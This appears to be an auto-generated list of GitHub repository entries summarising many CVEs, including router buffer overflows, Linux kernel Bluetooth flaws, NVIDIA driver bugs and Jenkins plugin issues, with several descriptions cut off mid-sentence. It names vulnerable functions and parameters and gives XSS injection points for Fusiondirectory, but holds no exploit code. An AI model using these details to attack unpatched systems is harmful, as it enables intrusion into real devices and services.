**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a pre-authentication buffer overflow in the main function via long post data. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44255](https://github.com/Live-Hack-CVE/CVE-2022-44255) create time: 2022-12-28T04:02:46Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter text in the setSmsCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44254](https://github.com/Live-Hack-CVE/CVE-2022-44254) create time: 2022-12-28T04:02:18Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter ip in the setDiagnosisCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44253](https://github.com/Live-Hack-CVE/CVE-2022-44253) create time: 2022-12-28T04:02:15Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter sPort/ePort in the setIpPortFilterRules function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44260](https://github.com/Live-Hack-CVE/CVE-2022-44260) create time: 2022-12-28T04:02:12Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter week, sTime, and eTime in the setParentalRules function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44259](https://github.com/Live-Hack-CVE/CVE-2022-44259) create time: 2022-12-28T04:02:08Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter command in the setTracerouteCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44258](https://github.com/Live-Hack-CVE/CVE-2022-44258) create time: 2022-12-28T04:02:04Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter pppoeUser in the setOpModeCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44257](https://github.com/Live-Hack-CVE/CVE-2022-44257) create time: 2022-12-28T04:02:01Z

**TOTOLINK LR350 V9.3.5u.6369_B20220309 contains a post-authentication buffer overflow via parameter lang in the setLanguageCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44256](https://github.com/Live-Hack-CVE/CVE-2022-44256) create time: 2022-12-28T04:01:57Z

**In GraphicsMagick, a heap buffer overflow was found when parsing MIFF. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1270](https://github.com/Live-Hack-CVE/CVE-2022-1270) create time: 2022-12-28T04:01:54Z

**Maarch RM 2.8.3 solution contains an improper restriction of excessive authentication attempts due to excessive verbose responses from the application. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to compromised accounts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37772](https://github.com/Live-Hack-CVE/CVE-2022-37772) create time: 2022-12-28T04:01:47Z

**An Arm product family through 2022-06-29 has a TOCTOU Race Condition that allows non-privileged user to make improper GPU processing operations to gain access to already freed memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34830](https://github.com/Live-Hack-CVE/CVE-2022-34830) create time: 2022-12-28T04:01:44Z

**immudb is a database with built-in cryptographic proof and verification. In versions prior to 1.4.1, a malicious immudb server can provide a falsified proof that will be accepted by the client SDK signing a falsified transaction replacing the genuine one. This situation can not be triggered by a genuine immudb server a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36111](https://github.com/Live-Hack-CVE/CVE-2022-36111) create time: 2022-12-28T04:01:40Z

**There is an infoleak vulnerability in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_parse_conf_req function which can be used to leak kernel pointers remotely. We recommend upgrading past commit https://github.com/torvalds/linux/commit/b1a2cd50c0357f243b7435a732b4e62ba3157a2e https://www.google.com/url CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42895](https://github.com/Live-Hack-CVE/CVE-2022-42895) create time: 2022-12-28T04:01:37Z

**There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42896](https://github.com/Live-Hack-CVE/CVE-2022-42896) create time: 2022-12-28T04:01:33Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44183](https://github.com/Live-Hack-CVE/CVE-2022-44183) create time: 2022-12-28T04:01:30Z

**A vulnerability was found in davidmoreno onion. It has been rated as problematic. Affected by this issue is the function onion_response_flush of the file src/onion/response.c of the component Log Handler. The manipulation leads to allocation of resources. The name of the patch is de8ea938342b36c28024fd8393ebc27b8442a16 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4066](https://github.com/Live-Hack-CVE/CVE-2022-4066) create time: 2022-12-28T04:01:26Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function form_fast_setting_wifi_set. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44171](https://github.com/Live-Hack-CVE/CVE-2022-44171) create time: 2022-12-28T04:01:23Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function R7WebsSecurityHandler. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44172](https://github.com/Live-Hack-CVE/CVE-2022-44172) create time: 2022-12-28T04:01:19Z

**Tenda AC18 V15.03.05.05 is vulnerable to Buffer Overflow via function formSetDeviceName. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44174](https://github.com/Live-Hack-CVE/CVE-2022-44174) create time: 2022-12-28T04:01:15Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function fromSetRouteStatic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44176](https://github.com/Live-Hack-CVE/CVE-2022-44176) create time: 2022-12-28T04:01:12Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44175](https://github.com/Live-Hack-CVE/CVE-2022-44175) create time: 2022-12-28T04:01:08Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formWifiWpsStart. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44177](https://github.com/Live-Hack-CVE/CVE-2022-44177) create time: 2022-12-28T04:01:05Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44178](https://github.com/Live-Hack-CVE/CVE-2022-44178) create time: 2022-12-28T04:01:01Z

**Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function addWifiMacFilter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44180](https://github.com/Live-Hack-CVE/CVE-2022-44180) create time: 2022-12-28T04:00:58Z

**super-xray is a vulnerability scanner (xray) GUI launcher. In version 0.1-beta, the URL is not filtered and directly spliced ??into the command, resulting in a possible RCE vulnerability. Users should upgrade to super-xray 0.2-beta. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41945](https://github.com/Live-Hack-CVE/CVE-2022-41945) create time: 2022-12-28T04:00:29Z

**Fusiondirectory 1.3 suffers from Improper Session Handling. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36179](https://github.com/Live-Hack-CVE/CVE-2022-36179) create time: 2022-12-28T04:00:25Z

**Fusiondirectory 1.3 is vulnerable to Cross Site Scripting (XSS) via /fusiondirectory/index.php?message=[injection], /fusiondirectory/index.php?message=invalidparameter&plug={Injection], /fusiondirectory/index.php?signout=1&message=[injection]&plug=106. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36180](https://github.com/Live-Hack-CVE/CVE-2022-36180) create time: 2022-12-28T04:00:22Z

**Out-of-bounds Write in GitHub repository vim/vim prior to 8.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2000](https://github.com/Live-Hack-CVE/CVE-2022-2000) create time: 2022-12-28T03:16:07Z

**The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-3389](https://github.com/Live-Hack-CVE/CVE-2011-3389) create time: 2022-12-28T03:17:01Z

**In The Sleuth Kit (TSK) 4.4.2, opening a crafted ISO 9660 image triggers an out-of-bounds read in iso9660_proc_dir() in tsk/fs/iso9660_dent.c in libtskfs.a, as demonstrated by fls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-13755](https://github.com/Live-Hack-CVE/CVE-2017-13755) create time: 2022-12-28T03:14:06Z

**In The Sleuth Kit (TSK) 4.4.2, fls hangs on a corrupt exfat image in tsk_img_read() in tsk/img/img_io.c in libtskimg.a. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-13760](https://github.com/Live-Hack-CVE/CVE-2017-13760) create time: 2022-12-28T03:14:03Z

**In The Sleuth Kit (TSK) 4.4.2, opening a crafted disk image triggers infinite recursion in dos_load_ext_table() in tsk/vs/dos.c in libtskvs.a, as demonstrated by mmls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-13756](https://github.com/Live-Hack-CVE/CVE-2017-13756) create time: 2022-12-28T03:13:49Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2771](https://github.com/Live-Hack-CVE/CVE-2018-2771) create time: 2022-12-28T03:19:33Z

**kernel drivers before version 4.17-rc1 are vulnerable to a weakness in the Linux kernel's implementation of random seed data. Programs, early in the boot sequence, could use the data allocated for the seed before it was sufficiently generated. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-1108](https://github.com/Live-Hack-CVE/CVE-2018-1108) create time: 2022-12-28T03:14:20Z

**In The Sleuth Kit (TSK) through 4.6.4, hfs_cat_traverse in tsk/fs/hfs.c does not properly determine when a key length is too large, which allows attackers to cause a denial of service (SEGV on unknown address with READ memory access in a tsk_getu16 call in hfs_dir_open_meta_cb in tsk/fs/hfs_dent.c). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19497](https://github.com/Live-Hack-CVE/CVE-2018-19497) create time: 2022-12-28T03:14:13Z

**The Sleuth Kit 4.6.0 and earlier is affected by: Integer Overflow. The impact is: Opening crafted disk image triggers crash in tsk/fs/hfs_dent.c:237. The component is: Overflow in fls tool used on HFS image. Bug is in tsk/fs/hfs.c file in function hfs_cat_traverse() in lines: 952, 1062. The attack vector is: Victim mus CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010065](https://github.com/Live-Hack-CVE/CVE-2019-1010065) create time: 2022-12-28T03:14:17Z

**Cyrus IMAP 2.5.x before 2.5.14 and 3.x before 3.0.12 allows privilege escalation because an HTTP request may be interpreted in the authentication context of an unrelated previous request that arrived over the same connection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18928](https://github.com/Live-Hack-CVE/CVE-2019-18928) create time: 2022-12-28T03:13:59Z

**Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12845](https://github.com/Live-Hack-CVE/CVE-2020-12845) create time: 2022-12-28T03:20:02Z

**Dell BSAFE Micro Edition Suite, versions prior to 4.5.1, contain an Improper Certificate Validation vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26184](https://github.com/Live-Hack-CVE/CVE-2020-26184) create time: 2022-12-28T03:19:59Z

**Dell BSAFE Micro Edition Suite, versions prior to 4.5.1, contain a Buffer Over-Read Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26185](https://github.com/Live-Hack-CVE/CVE-2020-26185) create time: 2022-12-28T03:19:51Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain a Use of Insufficiently Random Values Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35163](https://github.com/Live-Hack-CVE/CVE-2020-35163) create time: 2022-12-28T03:19:47Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.6, contain an Improper Input Validation Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29508](https://github.com/Live-Hack-CVE/CVE-2020-29508) create time: 2022-12-28T03:19:44Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.4, and Dell BSAFE Micro Edition Suite, versions before 4.4, contain an Improper Input Validation Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29507](https://github.com/Live-Hack-CVE/CVE-2020-29507) create time: 2022-12-28T03:19:40Z

**Dell BSAFE Crypto-C Micro Edition, versions before 4.1.5, and Dell BSAFE Micro Edition Suite, versions before 4.5.2, contain an Observable Timing Discrepancy Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29506](https://github.com/Live-Hack-CVE/CVE-2020-29506) create time: 2022-12-28T03:19:37Z

**CSRF in the /login URI in BlueOnyx 5209R allows an attacker to access the dashboard and perform scraping or other analysis. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5517](https://github.com/Live-Hack-CVE/CVE-2020-5517) create time: 2022-12-28T03:19:30Z

**URI.js is a javascript URL mutation library (npm package urijs). In URI.js before version 1.19.4, the hostname can be spoofed by using a backslash (`\`) character followed by an at (`@`) character. If the hostname is used in security decisions, the decision may be incorrect. Depending on library usage and attacker inte CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26291](https://github.com/Live-Hack-CVE/CVE-2020-26291) create time: 2022-12-28T03:18:00Z

**A heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially craft CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1712](https://github.com/Live-Hack-CVE/CVE-2020-1712) create time: 2022-12-28T03:16:26Z

**In version 4.8.0 and earlier of The Sleuth Kit (TSK), there is a stack buffer overflow vulnerability in the YAFFS file timestamp parsing logic in yaffsfs_istat() in fs/yaffs.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10232](https://github.com/Live-Hack-CVE/CVE-2020-10232) create time: 2022-12-28T03:15:49Z

**index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5844](https://github.com/Live-Hack-CVE/CVE-2020-5844) create time: 2022-12-28T03:15:46Z

**An issue was discovered in Varnish Cache before 6.0.6 LTS, 6.1.x and 6.2.x before 6.2.3, and 6.3.x before 6.3.2. It occurs when communication with a TLS termination proxy uses PROXY version 2. There can be an assertion failure and daemon restart, which causes a performance loss. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11653](https://github.com/Live-Hack-CVE/CVE-2020-11653) create time: 2022-12-28T03:14:10Z

**jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36518](https://github.com/Live-Hack-CVE/CVE-2020-36518) create time: 2022-12-28T03:12:06Z

**URI.js (aka urijs) before 1.19.6 mishandles certain uses of backslash such as http:\/ and interprets the URI as a relative path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27516](https://github.com/Live-Hack-CVE/CVE-2021-27516) create time: 2022-12-28T03:17:53Z

**A flaw was found in unzip. The vulnerability occurs due to improper handling of Unicode strings, which can lead to a null pointer dereference. This flaw allows an attacker to input a specially crafted zip file, leading to a crash or code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4217](https://github.com/Live-Hack-CVE/CVE-2021-4217) create time: 2022-12-28T03:17:21Z

**A flaw was found in the QXL display device emulation in QEMU. A double fetch of guest controlled values `cursor->header.width` and `cursor->header.height` can lead to the allocation of a small cursor object followed by a subsequent heap-based buffer overflow. A malicious privileged guest user could use this flaw to cra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4207](https://github.com/Live-Hack-CVE/CVE-2021-4207) create time: 2022-12-28T03:16:34Z

**XML External Entity (XXE) vulnerability in the file based service provider creation feature of the Management Console in WSO2 API Manager 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; and WSO2 IS as Key Manager 5.7.0, 5.9.0, and 5.10.0; and WSO2 Identity Server 5.7.0, 5.8.0, 5.9.0, 5.10.0, and 5.11.0. Allows attackers to gain CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-42646](https://github.com/Live-Hack-CVE/CVE-2021-42646) create time: 2022-12-28T03:16:04Z

**A flaw was found in libtpms. The flaw can be triggered by specially-crafted TPM 2 command packets containing illegal values and may lead to an out-of-bounds access when the volatile state of the TPM 2 is marshalled/written or unmarshalled/read. The highest threat from this vulnerability is to system availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3623](https://github.com/Live-Hack-CVE/CVE-2021-3623) create time: 2022-12-28T03:15:42Z

**It was found that the fix for CVE-2017-7500 and CVE-2017-7501 was incomplete: the check was only implemented for the parent directory of the file to be created. A local unprivileged user who owns another ancestor directory could potentially use this flaw to gain root privileges. The highest threat from this vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35939](https://github.com/Live-Hack-CVE/CVE-2021-35939) create time: 2022-12-28T03:15:35Z

**A symbolic link issue was found in rpm. It occurs when rpm sets the desired permissions and credentials after installing a file. A local unprivileged user could use this flaw to exchange the original file with a symbolic link to a security-critical file and escalate their privileges on the system. The highest threat fr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35938](https://github.com/Live-Hack-CVE/CVE-2021-35938) create time: 2022-12-28T03:15:00Z

**The Download Plugin WordPress plugin before 2.0.0 does not properly validate a user has the required privileges to access a backup's nonce identifier, which may allow any users with an account on the site (such as subscriber) to download a full copy of the website. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25059](https://github.com/Live-Hack-CVE/CVE-2021-25059) create time: 2022-12-28T02:38:35Z

**CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43258](https://github.com/Live-Hack-CVE/CVE-2021-43258) create time: 2022-12-28T02:38:10Z

**Linux PV device frontends vulnerable to attacks by backends T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Several Linux PV device frontends are using the grant table interfaces for removing access rights of the backends in ways being sub CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23040](https://github.com/Live-Hack-CVE/CVE-2022-23040) create time: 2022-12-28T03:20:06Z

**nheko is a desktop client for the Matrix communication application. All versions below 0.10.2 are vulnerable homeservers inserting malicious secrets, which could lead to man-in-the-middle attacks. Users can upgrade to version 0.10.2 to protect against this issue. As a workaround, one may apply the patch manually, avoid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39264](https://github.com/Live-Hack-CVE/CVE-2022-39264) create time: 2022-12-28T03:19:55Z

**The llhttp parser <v14.20.1, <v16.17.1 and <v18.9.1 in the http module in Node.js does not correctly handle multi-line Transfer-Encoding headers. This can lead to HTTP Request Smuggling (HRS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32215](https://github.com/Live-Hack-CVE/CVE-2022-32215) create time: 2022-12-28T03:19:26Z

**The llhttp parser <v14.20.1, <v16.17.1 and <v18.9.1 in the http module in Node.js does not correctly parse and validate Transfer-Encoding headers and can lead to HTTP Request Smuggling (HRS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32213](https://github.com/Live-Hack-CVE/CVE-2022-32213) create time: 2022-12-28T03:19:23Z

**A OS Command Injection vulnerability exists in Node.js versions <14.20.0, <16.16.0, <18.5.0 due to an insufficient IsAllowedHost check that can easily be bypassed because IsIPAddress does not properly check if an IP address is invalid before making DBS requests allowing rebinding attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32212](https://github.com/Live-Hack-CVE/CVE-2022-32212) create time: 2022-12-28T03:19:19Z

**An issue was discovered in OpenStack Sushy-Tools through 0.21.0 and VirtualBMC through 2.2.2. Changing the boot device configuration with these packages removes password protection from the managed libvirt XML domain. NOTE: this only affects an "unsupported, production-like configuration." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44020](https://github.com/Live-Hack-CVE/CVE-2022-44020) create time: 2022-12-28T03:19:16Z

**** DISPUTED ** A vulnerability was found in a port or fork of Redis. It has been declared as critical. This vulnerability affects unknown code in the library C:/Program Files/Redis/dbghelp.dll. The manipulation leads to uncontrolled search path. The attack can be initiated remotely. The exploit has been disclosed to th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3734](https://github.com/Live-Hack-CVE/CVE-2022-3734) create time: 2022-12-28T03:19:12Z

**A vulnerability in NetBatch-Plus software allows unauthorized access to the application. HPE has provided a workaround and fix. Please refer to HPE Security Bulletin HPESBNS04388 for details. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37931](https://github.com/Live-Hack-CVE/CVE-2022-37931) create time: 2022-12-28T03:19:08Z

**A user is able to enable their own account if it was disabled by an admin while the user still holds a valid session. Moreover, the username is not properly sanitized in the admin user overview. This enables an XSS attack that enables an attacker with a low privilege user to execute arbitrary JavaScript in the context CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4068](https://github.com/Live-Hack-CVE/CVE-2022-4068) create time: 2022-12-28T03:19:04Z

**Jenkins WildFly Deployer Plugin 1.0.2 and earlier implements functionality that allows agent processes to read arbitrary files on the Jenkins controller file system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41235](https://github.com/Live-Hack-CVE/CVE-2022-41235) create time: 2022-12-28T03:19:00Z

**Jenkins Semantic Versioning Plugin 1.13 and earlier does not restrict execution of an controller/agent message to agents, and implements no limitations about the file path that can be parsed, allowing attackers able to control agent processes to have Jenkins parse a crafted file that uses external entities for extracti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27201](https://github.com/Live-Hack-CVE/CVE-2022-27201) create time: 2022-12-28T03:18:57Z

**Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pinot Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Apache Airflow Pinot Provider ver CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38649](https://github.com/Live-Hack-CVE/CVE-2022-38649) create time: 2022-12-28T03:18:53Z

**Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in Apache Airflow Pig Provider, Apache Airflow allows an attacker to control commands executed in the task execution context, without write access to DAG files. This issue affects Pig Provider versions prior to 4.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40189](https://github.com/Live-Hack-CVE/CVE-2022-40189) create time: 2022-12-28T03:18:49Z

**A vulnerability in the CLI of Cisco Firepower Threat Defense (FTD) Software and Cisco FXOS Software could allow an authenticated, local attacker to execute arbitrary commands on the underlying operating system as root. This vulnerability is due to improper input validation for specific CLI commands. An attacker could e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-20934](https://github.com/Live-Hack-CVE/CVE-2022-20934) create time: 2022-12-28T03:18:46Z

**The Plugin LBstopattack WordPress plugin before 1.1.3 does not use nonces when saving its settings, making it possible for attackers to conduct CSRF attacks. This could allow attackers to disable the plugin's protections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3097](https://github.com/Live-Hack-CVE/CVE-2022-3097) create time: 2022-12-28T03:18:42Z

**Jenkins Pipeline Utility Steps Plugin 2.13.1 and earlier does not restrict the set of enabled prefix interpolators and bundles versions of Apache Commons Configuration library that enable the 'file:' prefix interpolator by default, allowing attackers able to configure Pipelines to read arbitrary files from the Jenkins CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45381](https://github.com/Live-Hack-CVE/CVE-2022-45381) create time: 2022-12-28T03:18:38Z

**Incorrect pointer checks within the NvmExpressDxe driver can allow tampering with SMRAM and OS memory Incorrect pointer checks within the NvmExpressDxe driver can allow tampering with SMRAM and OS memory. This issue was discovered by Insyde during security review. Fixed in: Kernel 5.1: Version 05.17.23 Kernel 5.2: Vers CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29278](https://github.com/Live-Hack-CVE/CVE-2022-29278) create time: 2022-12-28T03:18:35Z

**SMI functions in AhciBusDxe use untrusted inputs leading to corruption of SMRAM. SMI functions in AhciBusDxe use untrusted inputs leading to corruption of SMRAM. This issue was discovered by Insyde during security review. It was fixed in: Kernel 5.0: version 05.09.18 Kernel 5.1: version 05.17.18 Kernel 5.2: version 05. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29276](https://github.com/Live-Hack-CVE/CVE-2022-29276) create time: 2022-12-28T03:18:31Z

**.NET Framework Information Disclosure Vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41064](https://github.com/Live-Hack-CVE/CVE-2022-41064) create time: 2022-12-28T03:18:27Z

**IOBit IOTransfer V4 is vulnerable to Unquoted Service Path. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37197](https://github.com/Live-Hack-CVE/CVE-2022-37197) create time: 2022-12-28T03:18:08Z

**URL Confusion When Scheme Not Supplied in GitHub repository medialize/uri.js prior to 1.19.11. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1233](https://github.com/Live-Hack-CVE/CVE-2022-1233) create time: 2022-12-28T03:18:04Z

**URI.js is a Javascript URL mutation library. Before version 1.19.9, whitespace characters are not removed from the beginning of the protocol, so URLs are not parsed properly. This issue has been patched in version 1.19.9. Removing leading whitespace from values before passing them to URI.parse can be used as a workarou CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-24723](https://github.com/Live-Hack-CVE/CVE-2022-24723) create time: 2022-12-28T03:17:57Z

**Authorization Bypass Through User-Controlled Key in NPM urijs prior to 1.19.8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0613](https://github.com/Live-Hack-CVE/CVE-2022-0613) create time: 2022-12-28T03:17:50Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where a local user with basic capabilities can cause an out-of-bounds read, which may lead to denial of service, or information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31616](https://github.com/Live-Hack-CVE/CVE-2022-31616) create time: 2022-12-28T03:17:46Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where a local user with basic capabilities can cause an out-of-bounds read, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31617](https://github.com/Live-Hack-CVE/CVE-2022-31617) create time: 2022-12-28T03:17:43Z

**NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a local user with basic capabilities can cause a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34665](https://github.com/Live-Hack-CVE/CVE-2022-34665) create time: 2022-12-28T03:17:39Z

**NVIDIA CUDA Toolkit SDK contains a stack-based buffer overflow vulnerability in cuobjdump, where an unprivileged remote attacker could exploit this buffer overflow condition by persuading a local user to download a specially crafted corrupted file and execute cuobjdump against it locally, which may lead to a limited de CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34667](https://github.com/Live-Hack-CVE/CVE-2022-34667) create time: 2022-12-28T03:17:35Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where a local user with basic capabilities can cause improper input validation, which may lead to denial of service, escalation of privileges, data tampering, and limited information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31607](https://github.com/Live-Hack-CVE/CVE-2022-31607) create time: 2022-12-28T03:17:32Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys), where a local user with basic capabilities can cause an out-of-bounds write, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31610](https://github.com/Live-Hack-CVE/CVE-2022-31610) create time: 2022-12-28T03:17:28Z

